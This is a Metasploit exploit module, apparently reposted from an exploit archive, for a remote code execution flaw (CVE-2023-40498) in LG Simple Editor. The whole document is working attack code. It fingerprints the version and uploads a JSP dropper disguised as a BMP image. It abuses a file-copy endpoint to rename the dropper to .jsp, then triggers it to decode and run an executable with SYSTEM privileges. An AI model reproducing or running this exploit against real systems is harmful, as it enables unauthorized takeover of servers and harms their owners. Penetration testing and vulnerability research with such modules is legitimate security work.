LG Simple Editor Remote Code Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper # includes register_files_for_cleanup  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'LG Simple Editor Remote Code Execution',        'Description' => %q{          This Metasploit module exploits broken access control and directory traversal          vulnerabilities in LG Simple Editor software for gaining code execution.          The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.          By exploiting this flaw, an attacker can upload and execute a malicious JSP          payload with the SYSTEM user permissions.        },        'License' => MSF_LICENSE,        'Author' => [          'rgod', # Vulnerability discovery          'Ege Balcı <[email protected]>' # msf module        ],        'References' => [          ['ZDI', '23-1204'],          ['CVE', '2023-40498']        ],        'DefaultOptions' => {          'WfsDelay' => 5        },        'Platform' => %w[win],        'Arch' => [ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          ['LG Simple Editor <= v3.21', {}]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-08-24',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])      ]    )  end  def check    res = send_request_cgi(      {        'method' => 'GET',        'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')      }    )    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')    Exploit::CheckCode::Safe  end  def generate_jsp_payload    exe = generate_payload_exe    base64_exe = Rex::Text.encode_base64(exe)    payload_name = rand_text_alpha(rand(3..8))    var_raw = 'a' + rand_text_alpha(rand(3..10))    var_ostream = 'b' + rand_text_alpha(rand(3..10))    var_buf = 'c' + rand_text_alpha(rand(3..10))    var_decoder = 'd' + rand_text_alpha(rand(3..10))    var_tmp = 'e' + rand_text_alpha(rand(3..10))    var_path = 'f' + rand_text_alpha(rand(3..10))    var_proc2 = 'e' + rand_text_alpha(rand(3..10))    jsp = %|    <%@page import="java.io.*" %>    <%@page import="sun.misc.BASE64Decoder"%>    <%    try {      String #{var_buf} = "#{base64_exe}";      BASE64Decoder #{var_decoder} = new BASE64Decoder();      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());      File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");      String #{var_path} = #{var_tmp}.getAbsolutePath();      BufferedOutputStream #{var_ostream} =        new BufferedOutputStream(new FileOutputStream(#{var_path}));      #{var_ostream}.write(#{var_raw});      #{var_ostream}.close();      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});    } catch (Exception e) {    }    %>    |    jsp.gsub!(/[\n\t\r]/, '')    jsp  end  def copy_file(src, dst)    data = {      command: 'cp',      option: '-f',      srcPath: src,      destPath: dst    }    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'fileSystem',                               'makeDetailContent.do'),        'headers' => {          'X-Requested-With' => 'XMLHttpRequest',          'Accept' => 'application/json'        },        'ctype' => 'application/json',        'data' => data.to_json      }    )    if res && res.code == 200 && res.body.to_s.include?('errorMessage":"success",')      print_good "#{src} -> #{dst} copy successfull."    else      fail_with(Failure::UnexpectedReply, "#{peer} - Could not copy the payload.")    end  end  def exploit    rand_name = Rex::Text.rand_text_alpha(5)    form = Rex::MIME::Message.new    form.add_part(      generate_jsp_payload,      'image/bmp',      'binary',      "form-data; name=\"uploadFile\"; filename=\"#{rand_name}.bmp\""    )    form.add_part('/', nil, nil, 'form-data; name="uploadPath"')    form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_x"')    form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_y"')    form.add_part('1920', nil, nil, 'form-data; name="uploadFile_width"')    form.add_part('1080', nil, nil, 'form-data; name="uploadFile_height"')    print_status 'Uploading JSP payload...'    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadImage.do'),        'ctype' => "multipart/form-data; boundary=#{form.bound}",        'data' => form.to_s      }    )    if res && res.code == 200      print_good 'Payload uploaded successfully'    else      fail_with(Failure::UnexpectedReply, "#{peer} - Payload upload failed")    end    # Now we copy our payload as JSP    copy_file("/#{rand_name}_original.bmp", "/#{rand_name}.jsp")    register_files_for_cleanup("./webapps/simpleeditor/#{rand_name}.jsp")    print_status 'Triggering payload...'    send_request_cgi(      {        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', "#{rand_name}.jsp")      }    )  endend